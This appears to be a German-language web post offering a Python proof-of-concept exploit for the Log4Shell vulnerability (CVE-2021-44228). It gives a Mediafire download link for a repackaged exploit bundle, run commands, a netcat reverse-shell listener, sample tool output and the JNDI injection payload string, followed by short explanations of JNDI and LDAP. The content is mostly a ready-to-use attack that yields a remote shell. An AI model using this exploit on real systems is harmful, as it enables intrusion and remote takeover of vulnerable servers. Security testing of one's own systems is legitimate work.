
Python-basierter Exploit für CVE-2021-44228 (Log4Shell), der eine bösartige Java-Klasse generiert, einen gefälschten LDAP-Server einrichtet und eine Reverse Shell über JNDI-Injektion bereitstellt.
Log4Shell Schwachstellen-Testwerkzeug https://log4shell.tools/
Exploit mit bereits enthaltenem Java, um kein Konto erstellen zu müssen usw..
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
pip install -r requirements.txt
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
nc -lvnp 9001
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
Grundkonzept von log4j
Was ist JNDI
JNDI ist eine Java-API für einen Verzeichnisdienst, der es Java-Software-Clients ermöglicht, Daten und Ressourcen über einen Namen zu entdecken und zu suchen.
Was ist LDAP
LDAP ist ein Verzeichniszugriffsprotokoll. LDAP kann verwendet werden, um Benutzernamen und Passwörter mit Servern wie Docker, Jenkins, Kubernetes, OpenVPN und Linux Samba zu validieren. LDAP Single Sign-On kann auch von Systemadministratoren verwendet werden, um den Zugriff auf eine LDAP-Datenbank zu steuern.
WER MEHR ÜBER DIE SCHWACHSTELLE ERFAHREN MÖCHTE, FINDET HIER DIE DOKUMENTATION:
https://www.lunasec.io/docs/blog/log4j-zero-day/
EXPLOIT OHNE JAVA INKLUSIVE